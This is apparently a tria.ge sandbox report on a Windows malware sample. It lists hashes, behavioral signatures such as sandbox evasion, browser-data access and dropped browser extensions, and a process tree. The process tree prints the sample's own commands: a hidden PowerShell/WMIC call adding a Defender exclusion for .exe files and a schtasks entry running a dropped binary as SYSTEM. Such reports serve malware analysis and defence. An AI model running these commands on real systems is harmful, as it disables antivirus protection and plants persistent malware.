Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
102s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
11/04/2024, 17:02
Static task
static1
Behavioral task
behavioral1
Sample
a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe
Resource
win10v2004-20240226-en
General
-
Target
a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe
-
Size
6.5MB
-
MD5
750872686fc2c616861c93b2f9132d5e
-
SHA1
d27bf0db81fb395fe3d6ace1c74c90e1c776a853
-
SHA256
a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b
-
SHA512
afef9999f91c831220df465a9174be5f80c8d1fe2996312845a59a73a8c18936e60f5520cfdf9fc16cf5ba96ba75ea77d31e07aedb68af06df9cab3bc093ea25
-
SSDEEP
98304:91O9tCheY8CeaL3od2rNGNdMdSa1zJTH4DcftNHjoIpH:91O9UheY8CLodwGNOdSa7MsoI9
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 19 2136 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Control Panel\International\Geo\Nation bDkvZNw.exe -
Executes dropped EXE 3 IoCs
pid Process 4912 Install.exe 1888 zBzIpis.exe 1936 bDkvZNw.exe -
Loads dropped DLL 1 IoCs
pid Process 2136 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json bDkvZNw.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json bDkvZNw.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini bDkvZNw.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 bDkvZNw.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 bDkvZNw.exe File created C:\Windows\system32\GroupPolicy\gpt.ini zBzIpis.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies bDkvZNw.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 bDkvZNw.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol zBzIpis.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 bDkvZNw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 bDkvZNw.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\eBaLNwdfBoAU2\JMAZPfckXyiGQ.dll bDkvZNw.exe File created C:\Program Files (x86)\eBaLNwdfBoAU2\RruFcMY.xml bDkvZNw.exe File created C:\Program Files (x86)\feaAGXZTPHSTZufvckR\IIDjnbL.dll bDkvZNw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi bDkvZNw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak bDkvZNw.exe File created C:\Program Files (x86)\CsUgOGApU\MywMKWK.xml bDkvZNw.exe File created C:\Program Files (x86)\YXRVthYkCAsAC\iDvCuQY.dll bDkvZNw.exe File created C:\Program Files (x86)\VQnigEewLHUn\OqpBvua.dll bDkvZNw.exe File created C:\Program Files (x86)\CsUgOGApU\MZfkyG.dll bDkvZNw.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi bDkvZNw.exe File created C:\Program Files (x86)\feaAGXZTPHSTZufvckR\vDJuyOT.xml bDkvZNw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja bDkvZNw.exe File created C:\Program Files (x86)\YXRVthYkCAsAC\mDdvrUo.xml bDkvZNw.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak bDkvZNw.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bHNJINcAmGBfsLXkXG.job schtasks.exe File created C:\Windows\Tasks\TVsECgUtwDhLZifMW.job schtasks.exe File created C:\Windows\Tasks\jHYEWeDFllXYdol.job schtasks.exe File created C:\Windows\Tasks\IypqguOSOyxhMfXuI.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4652 schtasks.exe 1020 schtasks.exe 956 schtasks.exe 2060 schtasks.exe 920 schtasks.exe 4412 schtasks.exe 1492 schtasks.exe 128 schtasks.exe 1496 schtasks.exe 1336 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b01510ee-0000-0000-0000-d01200000000}\MaxCapacity = "14116" bDkvZNw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix bDkvZNw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" bDkvZNw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" bDkvZNw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" bDkvZNw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume bDkvZNw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer zBzIpis.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" bDkvZNw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "0" zBzIpis.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3524 powershell.exe 3524 powershell.exe 1928 powershell.exe 1928 powershell.exe 32 powershell.exe 32 powershell.exe 3684 powershell.EXE 3684 powershell.EXE 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 5068 powershell.exe 5068 powershell.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe 1936 bDkvZNw.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3524 powershell.exe Token: SeIncreaseQuotaPrivilege 4888 WMIC.exe Token: SeSecurityPrivilege 4888 WMIC.exe Token: SeTakeOwnershipPrivilege 4888 WMIC.exe Token: SeLoadDriverPrivilege 4888 WMIC.exe Token: SeSystemProfilePrivilege 4888 WMIC.exe Token: SeSystemtimePrivilege 4888 WMIC.exe Token: SeProfSingleProcessPrivilege 4888 WMIC.exe Token: SeIncBasePriorityPrivilege 4888 WMIC.exe Token: SeCreatePagefilePrivilege 4888 WMIC.exe Token: SeBackupPrivilege 4888 WMIC.exe Token: SeRestorePrivilege 4888 WMIC.exe Token: SeShutdownPrivilege 4888 WMIC.exe Token: SeDebugPrivilege 4888 WMIC.exe Token: SeSystemEnvironmentPrivilege 4888 WMIC.exe Token: SeRemoteShutdownPrivilege 4888 WMIC.exe Token: SeUndockPrivilege 4888 WMIC.exe Token: SeManageVolumePrivilege 4888 WMIC.exe Token: 33 4888 WMIC.exe Token: 34 4888 WMIC.exe Token: 35 4888 WMIC.exe Token: 36 4888 WMIC.exe Token: SeIncreaseQuotaPrivilege 4888 WMIC.exe Token: SeSecurityPrivilege 4888 WMIC.exe Token: SeTakeOwnershipPrivilege 4888 WMIC.exe Token: SeLoadDriverPrivilege 4888 WMIC.exe Token: SeSystemProfilePrivilege 4888 WMIC.exe Token: SeSystemtimePrivilege 4888 WMIC.exe Token: SeProfSingleProcessPrivilege 4888 WMIC.exe Token: SeIncBasePriorityPrivilege 4888 WMIC.exe Token: SeCreatePagefilePrivilege 4888 WMIC.exe Token: SeBackupPrivilege 4888 WMIC.exe Token: SeRestorePrivilege 4888 WMIC.exe Token: SeShutdownPrivilege 4888 WMIC.exe Token: SeDebugPrivilege 4888 WMIC.exe Token: SeSystemEnvironmentPrivilege 4888 WMIC.exe Token: SeRemoteShutdownPrivilege 4888 WMIC.exe Token: SeUndockPrivilege 4888 WMIC.exe Token: SeManageVolumePrivilege 4888 WMIC.exe Token: 33 4888 WMIC.exe Token: 34 4888 WMIC.exe Token: 35 4888 WMIC.exe Token: 36 4888 WMIC.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 32 powershell.exe Token: SeDebugPrivilege 3684 powershell.EXE Token: SeDebugPrivilege 5068 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2660 WMIC.exe Token: SeIncreaseQuotaPrivilege 2660 WMIC.exe Token: SeSecurityPrivilege 2660 WMIC.exe Token: SeTakeOwnershipPrivilege 2660 WMIC.exe Token: SeLoadDriverPrivilege 2660 WMIC.exe Token: SeSystemtimePrivilege 2660 WMIC.exe Token: SeBackupPrivilege 2660 WMIC.exe Token: SeRestorePrivilege 2660 WMIC.exe Token: SeShutdownPrivilege 2660 WMIC.exe Token: SeSystemEnvironmentPrivilege 2660 WMIC.exe Token: SeUndockPrivilege 2660 WMIC.exe Token: SeManageVolumePrivilege 2660 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2660 WMIC.exe Token: SeIncreaseQuotaPrivilege 2660 WMIC.exe Token: SeSecurityPrivilege 2660 WMIC.exe Token: SeTakeOwnershipPrivilege 2660 WMIC.exe Token: SeLoadDriverPrivilege 2660 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4624 wrote to memory of 4912 4624 a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe 76 PID 4624 wrote to memory of 4912 4624 a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe 76 PID 4624 wrote to memory of 4912 4624 a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe 76 PID 4912 wrote to memory of 3892 4912 Install.exe 78 PID 4912 wrote to memory of 3892 4912 Install.exe 78 PID 4912 wrote to memory of 3892 4912 Install.exe 78 PID 3892 wrote to memory of 3780 3892 forfiles.exe 80 PID 3892 wrote to memory of 3780 3892 forfiles.exe 80 PID 3892 wrote to memory of 3780 3892 forfiles.exe 80 PID 3780 wrote to memory of 3524 3780 cmd.exe 81 PID 3780 wrote to memory of 3524 3780 cmd.exe 81 PID 3780 wrote to memory of 3524 3780 cmd.exe 81 PID 3524 wrote to memory of 4888 3524 powershell.exe 82 PID 3524 wrote to memory of 4888 3524 powershell.exe 82 PID 3524 wrote to memory of 4888 3524 powershell.exe 82 PID 4912 wrote to memory of 1020 4912 Install.exe 84 PID 4912 wrote to memory of 1020 4912 Install.exe 84 PID 4912 wrote to memory of 1020 4912 Install.exe 84 PID 1888 wrote to memory of 1928 1888 zBzIpis.exe 87 PID 1888 wrote to memory of 1928 1888 zBzIpis.exe 87 PID 1888 wrote to memory of 1928 1888 zBzIpis.exe 87 PID 1928 wrote to memory of 2372 1928 powershell.exe 89 PID 1928 wrote to memory of 2372 1928 powershell.exe 89 PID 1928 wrote to memory of 2372 1928 powershell.exe 89 PID 2372 wrote to memory of 128 2372 cmd.exe 90 PID 2372 wrote to memory of 128 2372 cmd.exe 90 PID 2372 wrote to memory of 128 2372 cmd.exe 90 PID 1928 wrote to memory of 1592 1928 powershell.exe 91 PID 1928 wrote to memory of 1592 1928 powershell.exe 91 PID 1928 wrote to memory of 1592 1928 powershell.exe 91 PID 1928 wrote to memory of 2300 1928 powershell.exe 92 PID 1928 wrote to memory of 2300 1928 powershell.exe 92 PID 1928 wrote to memory of 2300 1928 powershell.exe 92 PID 1928 wrote to memory of 1336 1928 powershell.exe 93 PID 1928 wrote to memory of 1336 1928 powershell.exe 93 PID 1928 wrote to memory of 1336 1928 powershell.exe 93 PID 1928 wrote to memory of 2904 1928 powershell.exe 94 PID 1928 wrote to memory of 2904 1928 powershell.exe 94 PID 1928 wrote to memory of 2904 1928 powershell.exe 94 PID 1928 wrote to memory of 3588 1928 powershell.exe 95 PID 1928 wrote to memory of 3588 1928 powershell.exe 95 PID 1928 wrote to memory of 3588 1928 powershell.exe 95 PID 1928 wrote to memory of 832 1928 powershell.exe 96 PID 1928 wrote to memory of 832 1928 powershell.exe 96 PID 1928 wrote to memory of 832 1928 powershell.exe 96 PID 1928 wrote to memory of 5056 1928 powershell.exe 97 PID 1928 wrote to memory of 5056 1928 powershell.exe 97 PID 1928 wrote to memory of 5056 1928 powershell.exe 97 PID 1928 wrote to memory of 404 1928 powershell.exe 98 PID 1928 wrote to memory of 404 1928 powershell.exe 98 PID 1928 wrote to memory of 404 1928 powershell.exe 98 PID 1928 wrote to memory of 2512 1928 powershell.exe 99 PID 1928 wrote to memory of 2512 1928 powershell.exe 99 PID 1928 wrote to memory of 2512 1928 powershell.exe 99 PID 1928 wrote to memory of 924 1928 powershell.exe 100 PID 1928 wrote to memory of 924 1928 powershell.exe 100 PID 1928 wrote to memory of 924 1928 powershell.exe 100 PID 1928 wrote to memory of 4736 1928 powershell.exe 101 PID 1928 wrote to memory of 4736 1928 powershell.exe 101 PID 1928 wrote to memory of 4736 1928 powershell.exe 101 PID 1928 wrote to memory of 4164 1928 powershell.exe 102 PID 1928 wrote to memory of 4164 1928 powershell.exe 102 PID 1928 wrote to memory of 4164 1928 powershell.exe 102 PID 1928 wrote to memory of 4540 1928 powershell.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe"C:\Users\Admin\AppData\Local\Temp\a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Users\Admin\AppData\Local\Temp\7zS567C.tmp\Install.exe.\Install.exe /GdidBRgiK "385118" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bHNJINcAmGBfsLXkXG" /SC once /ST 17:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\zBzIpis.exe\" kg /xlsite_idfLb 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1020
-
-
-
C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\zBzIpis.exeC:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\zBzIpis.exe kg /xlsite_idfLb 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
